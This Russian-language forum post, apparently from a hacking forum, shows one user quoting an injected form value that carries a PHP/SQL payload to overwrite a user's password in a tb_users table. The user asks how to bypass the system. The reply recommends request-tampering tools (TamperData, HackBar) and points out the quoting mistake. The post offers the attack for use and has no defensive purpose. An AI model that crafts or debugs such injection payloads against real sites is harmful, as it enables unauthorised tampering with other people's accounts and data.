Показать сообщение отдельно

  #7  
Старый 04.04.2010, 16:43
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами: 9364549

Репутация: 184
По умолчанию

Цитата:
Сообщение от GivioN  
https://forum.antichat.ru/showpost.php?p=572143&postcount=10 =(

если в переменную вставить это:


ТО цель будет выполнена. Но не работает так как при отправке пост запроса отредактированного оперой получается такой код:

<select name="nomer">
<option value="1">1 бла бла</option>
<option value="2">2 бла бла</option>
<option value="2')""); mysql_query("UPDATE tb_users SET password='123' WHERE username='GivioN'"); //">3 бла бла</option>
</select><br><br></body></html>

где третье значение имеет двойные ковычки и весь код не отправляется... Как можно надурить систему? Или InetCrack рулит в этом случаи?
В этом случае рулит firefox и tamperdata / hackbar
Редактируя в опере, ты пишешь там фигню - у тебя двойные кавычки 3 раза встречаются, куда это годится?
 
Ответить с цитированием